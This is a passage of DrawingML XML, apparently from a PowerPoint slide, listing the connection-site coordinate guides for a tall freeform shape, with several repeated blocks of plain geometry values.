              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 462722 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 462749 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY129" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY130" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 462722 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 381264 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY129" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
